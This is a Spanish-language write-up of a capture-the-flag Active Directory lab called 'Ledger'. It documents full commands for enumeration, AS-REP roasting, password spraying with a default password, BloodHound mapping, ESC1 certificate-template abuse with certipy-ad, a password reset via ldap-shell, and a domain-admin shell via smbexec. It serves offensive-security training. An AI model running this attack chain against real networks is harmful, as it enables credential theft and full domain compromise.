🖥️Ledger (AD)
This challenge simulates a real cyber-attack scenario where you must exploit an Active Directory.
Enumeración de Red
Nmap
autoscan 10.10.166.235Resultado Nmap
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-08 08:38:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:labyrinth.thm.local, DNS:thm.local, DNS:THM
| Not valid before: 2023-05-12T07:32:36
|_Not valid after: 2024-05-11T07:32:36
|_ssl-date: 2025-08-08T08:39:35+00:00; +1s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2025-08-08T08:39:35+00:00; +1s from scanner time.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=thm-LABYRINTH-CA
| Not valid before: 2023-05-12T07:26:00
|_Not valid after: 2028-05-12T07:35:59
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:labyrinth.thm.local, DNS:thm.local, DNS:THM
| Not valid before: 2023-05-12T07:32:36
|_Not valid after: 2024-05-11T07:32:36
|_ssl-date: 2025-08-08T08:39:35+00:00; +1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:labyrinth.thm.local, DNS:thm.local, DNS:THM
| Not valid before: 2023-05-12T07:32:36
|_Not valid after: 2024-05-11T07:32:36
|_ssl-date: 2025-08-08T08:39:35+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: thm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:labyrinth.thm.local, DNS:thm.local, DNS:THM
| Not valid before: 2023-05-12T07:32:36
|_Not valid after: 2024-05-11T07:32:36
|_ssl-date: 2025-08-08T08:39:35+00:00; +1s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=labyrinth.thm.local
| Not valid before: 2025-08-07T08:33:36
|_Not valid after: 2026-02-06T08:33:36
|_ssl-date: 2025-08-08T08:39:35+00:00; +1s from scanner time.
7680/tcp open pando-pub?
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49702/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
Service Info: Host: LABYRINTH; OS: Windows; CPE: cpe:/o:microsoft:windowsWindows - Active Directory
DNS: labyrinth.thm.local
web: 80 (IIS)
enum: ldap,smb,rpc,kerberos
labyrinth.thm.local → /etc/hosts
Enumeración de Dominio - enum4linux-ng
enum4linux-ngenum4linux-ng -A 10.10.166.235NetBIOS computer name: LABYRINTH
NetBIOS domain name: THM
DNS domain: thm.local
FQDN: labyrinth.thm.local
Enumeración de Usuarios - LDAP (Anon Bind)
ldapsearch -x -H ldap://10.10.166.235 -b "dc=thm,dc=local" "(objectClass=person)" > ldap-enum.txtcat ldap-enum.txt | grep "AccountName" | cut -d " " -f 2 > users.txtAS-REP Roasting
Enumeración - UF_DONT_REQUIRE_PREAUTH
UF_DONT_REQUIRE_PREAUTHimpacket-GetNPUsers thm.local/ -dc-ip 10.10.166.235 -usersfile users.txt -format hashcat -outputfile hashes.txt -no-passHash cracking
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txtNingún resultado válido
Enumeración de Dominio - netexec LDAP
nxc ldap 10.10.166.235 -u "uwu" -p "" --usersIVY_WILLIS - Please change it: CHANGEME2023!
SUSANNA_MCKNIGHT - Please change it: CHANGEME2023!vPassword Spraying
crackmapexec smb 10.10.166.235 -u users2.txt -p CHANGEME2023![+] thm.local\SUSANNA_MCKNIGHT:CHANGEME2023!
impacket-smbexec tmh.local/SUSANNA_MCKNIGHT:[email protected]Sin permisos
Acceso Remoto - RDP
xfreerdp3 /v:10.10.166.235 /u:SUSANNA_MCKNIGHT /p:CHANGEME2023!Intrusión en el Sistema
Sesión Remota: Susanna
Enumeración Autenticada de Dominio - BloodHound
bloodhound-python -u SUSANNA_MCKNIGHT -p 'CHANGEME2023!' -d thm.local -ns 10.10.166.235 -c All --zip[email protected]no tiene ninguna conexión especial con ningún nodo
Enumeración Post-Intrusión
whoami /groupsBUILTIN\Certificate Service DCOM Access
Recurso
C:\Users\.
Administrator
BRADLEY_ORTIZ
Información de BloodHound
BRADLEY_ORTIZ →
MemberOf→ [email protected]
Escalada de Privilegios: Domain Admin Impersonation (Misconfigured Certificate Templates - ESC1)
certipy-ad find -u SUSANNA_MCKNIGHT -p CHANGEME2023! -dc-ip 10.10.166.235certipy-ad req -u 'SUSANNA_MCKNIGHT' -p 'CHANGEME2023!' -ca 'thm-LABYRINTH-CA' -template 'ServerAuth' -upn '[email protected]' -target 'labyrinth.thm.local' -dns '10.10.166.235'certipy-ad auth -pfx bardley_ortiz_10.pfx -dc-ip 10.10.166.235ERROR → KDC_ERR_PADATA_TYPE_NOSUPP (KDC has no support for padata type)
Recurso
Explotación mediante LDAP-Shell
certipy-ad auth -ldap-shell -pfx bradley_ortiz_10.pfx -dc-ip 10.10.166.235change_password BRADLEY_ORTIZ Password123impacket-smbexec 'thm.local/BRADLEY_ORTIZ:[email protected]'Compromiso del Sistema
Shell: Domain Admin
Última actualización